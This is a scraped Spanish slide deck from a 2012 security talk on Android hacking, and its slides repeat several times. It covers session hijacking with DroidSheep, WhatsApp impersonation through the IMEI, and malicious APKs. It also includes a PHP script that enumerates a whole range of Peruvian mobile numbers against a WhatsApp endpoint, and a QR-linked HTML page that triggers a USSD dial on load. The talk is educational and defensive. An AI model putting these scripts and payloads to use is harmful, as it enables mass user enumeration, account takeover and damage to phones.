presentación de powerpoint - | blog de omar android... · script para la verificación de usuarios...
TRANSCRIPT
DISCLAIMER
Todo el contenido de esta charla es resultado de investigacioacuten con
fines didaacutecticos y educativos El autor no se hace responsable por el
uso del conocimiento contenido en la siguiente presentacioacuten La
informacioacuten contenida debe ser utilizada uacutenicamente para fines eacuteticos
y con la debida autorizacioacuten
Todo descubrimiento realizado ha sido y seraacute usado de forma legal
La audiencia debe asumir todo lo que se exponga hoy como ldquofalsordquo y
ldquosin fundamentordquo hasta que lo compruebe personalmente Limahack
no es el autor directo de ninguno de los descubrimientos expuestos
ni de las herramientas demostradas ni los conoce
Todas las opiniones vertidas durante esta presentacioacuten son
exclusivas del expositor Limahack no es responsable de ninguna de
las opiniones vertidas
aula H4XOR O
mar Palo
min
o
Android mobile hacking
ataques y atacando con el androide
iquestPor queacute Android Ataques a Sistemas Operativos Windows - Linux Ataques a redes LAN desde Android Atacando a sistemas Android
iquestQuieacuten soy
bull Ing Sistemas y Maestrista de Ing de
Computacioacuten y Sistemas
bull Certificado CEHv7 Security+ ITILv3
bull Consultor en Seguridad de informacioacuten
bull Psicoacutelogo que aun no comienza sus
estudioshellip
bull Escritor en mis tiempos libres
httpwwwel-palomocom
httpwwwfacebookcomElPalomoSeguridadInformacion
omarc320gmailcom
iquestPor queacute Android
68
17
5 4 4
2 0
Participacioacuten en el mercado de Sistemas Operativos moacuteviles
Android
IOS
Blackberry
Symbian
Windows
Linux
Otros
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
aula H4XOR O
mar Palo
min
o
Android mobile hacking
ataques y atacando con el androide
iquestPor queacute Android Ataques a Sistemas Operativos Windows - Linux Ataques a redes LAN desde Android Atacando a sistemas Android
iquestQuieacuten soy
bull Ing Sistemas y Maestrista de Ing de
Computacioacuten y Sistemas
bull Certificado CEHv7 Security+ ITILv3
bull Consultor en Seguridad de informacioacuten
bull Psicoacutelogo que aun no comienza sus
estudioshellip
bull Escritor en mis tiempos libres
httpwwwel-palomocom
httpwwwfacebookcomElPalomoSeguridadInformacion
omarc320gmailcom
iquestPor queacute Android
68
17
5 4 4
2 0
Participacioacuten en el mercado de Sistemas Operativos moacuteviles
Android
IOS
Blackberry
Symbian
Windows
Linux
Otros
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
iquestQuieacuten soy
bull Ing Sistemas y Maestrista de Ing de
Computacioacuten y Sistemas
bull Certificado CEHv7 Security+ ITILv3
bull Consultor en Seguridad de informacioacuten
bull Psicoacutelogo que aun no comienza sus
estudioshellip
bull Escritor en mis tiempos libres
httpwwwel-palomocom
httpwwwfacebookcomElPalomoSeguridadInformacion
omarc320gmailcom
iquestPor queacute Android
68
17
5 4 4
2 0
Participacioacuten en el mercado de Sistemas Operativos moacuteviles
Android
IOS
Blackberry
Symbian
Windows
Linux
Otros
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
iquestPor queacute Android
68
17
5 4 4
2 0
Participacioacuten en el mercado de Sistemas Operativos moacuteviles
Android
IOS
Blackberry
Symbian
Windows
Linux
Otros
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
